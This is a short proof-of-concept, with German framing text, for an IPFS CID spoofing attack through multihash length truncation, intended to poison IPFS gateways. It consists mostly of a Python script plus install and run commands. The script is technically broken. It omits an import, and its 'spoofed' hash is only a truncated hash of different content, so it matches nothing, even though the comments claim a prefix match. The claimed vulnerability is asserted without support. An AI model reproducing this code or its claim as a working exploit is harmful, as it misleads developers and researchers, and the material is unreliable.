
Python-Proof-of-Concept, das IPFS-CID-Spoofing mittels Multihash-Längenerweiterung demonstriert und Schwachstellen in der Content-Adressierungs-Verifikation aufzeigt, die IPFS-Gateways vergiften können.
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.
Eine IPFS-Implementierung vertraut dem Längenfeld im Multihash einer CID, ohne zu überprüfen, ob der Hash selbst mit dem vollständigen Inhalt übereinstimmt. Ein Angreifer kann eine Datei erstellen, deren abgeschnittener Hash dem Präfix des Hashs einer legitimen Datei entspricht, und die schädliche Datei unter derselben CID ausliefern.
Führen Sie das Skript aus:
pip install py-multihash py-cid
python ipfs_cid_spoof.py
Es zeigt, dass eine gefälschte CID erzeugt werden kann.